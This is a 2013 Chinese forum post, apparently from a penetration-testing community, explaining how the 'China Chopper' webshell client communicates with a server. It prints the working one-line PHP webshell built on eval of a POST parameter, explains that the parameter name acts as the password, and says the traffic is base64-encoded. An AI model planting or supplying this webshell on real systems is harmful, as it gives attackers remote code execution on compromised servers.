灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2853回复:0

中国菜刀执行过程

楼主#
更多 发布于:2013-06-08 11:15
作者:0x007
对于玩渗透的人来说  一句话 中国菜刀 肯定不陌生   那么菜刀到底是怎么样判断他的密码呢? 如何列目录的呢?  我们一一来进行科普下。
一句话:<?php @eval($_POST[fuck])?>
这是php的一句话密码。不懂的人来说  这怎么样是木马呢? 这明明是正常的php语法。别着急,慢慢讲解。
上面的一句话是服务端 也就是说  他等待post提交变量名fuck的数据  
现在是逆向思维 我们先用正向思维去看
<form action="a.php" method="post">
name: <input type="text" name="fuck" />
<input type="submit" />
Welcome <?php echo $_POST["fuck"]; ?>.
这个代码 你们肯定都熟悉  post提交变量名为fuck的数据给a.php  之后输出
那菜刀就是你先把接受端上传到服务器  之后我们自己提交数据给接收端
例:<?php @eval($_POST[fuck])?>
那么提交的时候肯定是post提交数据 之后执行的相应的代码,比如说列目录?写文件?等等 fuck=.......代码   接收端接受到之后eval执行  执行之后会出现相应值。那么菜刀再去读取。
至于密码这里 我这样解释了 相信大家也看的清楚了 为何还有密码这个说法。 因为接收端的fuck,你输入123的变量去提交 接受端不认识123变量是什么 那里来的,所以就无法执行。
菜刀通讯加密使用base64

喜欢0 评分0
游客

返回顶部